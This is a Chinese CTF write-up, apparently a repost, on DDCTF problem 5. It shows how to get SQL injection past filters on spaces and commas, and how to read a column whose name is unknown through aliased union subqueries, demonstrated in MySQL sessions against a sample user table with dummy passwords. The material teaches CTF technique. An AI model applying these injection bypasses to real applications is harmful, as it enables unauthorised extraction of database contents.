前言
本文介绍的是DDCTF第五题,绕过未知字段名的技巧,这里拿本机来操作了下,思路很棒也很清晰,分享给大家,下面来看看详细的介绍:
实现思路
题目过滤空格和逗号,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括号都可以绕过,逗号使用join绕过;
存放flag的字段名未知,information_schema.columns也将表名的hex过滤了,即获取不到字段名;这时可以利用联合查询,过程如下:
思想就是获取flag,让其在已知字段名下出现;
示例代码:
mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;+---+---+---+---+| a | b | c | d |+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+| 1 | 2 | 3 | 4 |+---+---+---+---+1 row in set (0.00 sec) mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;+---+-------+----------+-------------+| 1 | 2 | 3 | 4 |+---+-------+----------+-------------+| 1 | 2 | 3 | 4 || 1 | admin | admin888 | 110@110.com || 2 | test | test123 | 119@119.com || 3 | cs | cs123 | 120@120.com |+---+-------+----------+-------------+4 rows in set (0.01 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;+-------------+| 4 |+-------------+| 4 || 110@110.com || 119@119.com || 120@120.com |+-------------+4 rows in set (0.03 sec) mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3; +-------------+| 4 |+-------------+| 120@120.com |+-------------+1 row in set (0.01 sec) mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)dunion select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;+-------------+----------+----------+-------------+| id | username | password | email |+-------------+----------+----------+-------------+| 1 | admin | admin888 | 110@110.com || 120@120.com | 1 | 1 | 1 |+-------------+----------+----------+-------------+2 rows in set (0.04 sec) |
总结
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对错新站长站的支持。
新闻热点
疑难解答